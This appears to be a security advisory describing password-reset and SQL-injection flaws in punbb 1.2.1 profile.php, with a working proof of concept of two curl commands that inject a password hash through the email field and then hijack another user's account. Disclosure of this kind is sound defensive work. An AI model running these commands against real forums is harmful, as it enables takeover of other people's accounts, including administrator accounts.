======================================================= Multiple vulnerabilities in punbb-1.2.1 profile.php ======================================================= Description ----------- A remote attacker without an account can set the password of any user on the system to NULL, effectivley shuting them out of the system. A user on the system can also inject an arbitrary SQL statement using the change email feature. This has occured because of a fault in the is_valid_email function which returns true for strings that are not even close to being a valid email. This also affects systems using the magic_quotes_gpc option in php.ini. By combining these two an attacker with an account on the forum can change the password for any user to anything he/she wants to, gaining full access to the administrator account. Proof of concept ---------------- Examples of the damage the DoS attack and arbitrary SQL statement attacks can do on their own has been omitted. This is a demonstration of their power when combined. Assumptions for this particular example: - There is a user on the system with id 3 that has username/password set to 'sha'/'passwd'. - The cookie is valid for sha on system - The system supports sha1. - The new password for the id 2 account is supposed to be 'newpass'. curl --cookie punbb_cookie= --form form_sent=1 --form req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@punbb.com" http://target/profile.php?action=change_email\&id=3 This will push the sha1 encrypted password 'newpass' into every users activate_string field. All that needs to be done is pushing this field to the password field of any user we want using the other bug. curl http://target/profile.php?action=change_pass\&id=2\&key= Now the account with user id 2 has the password 'newpass' set.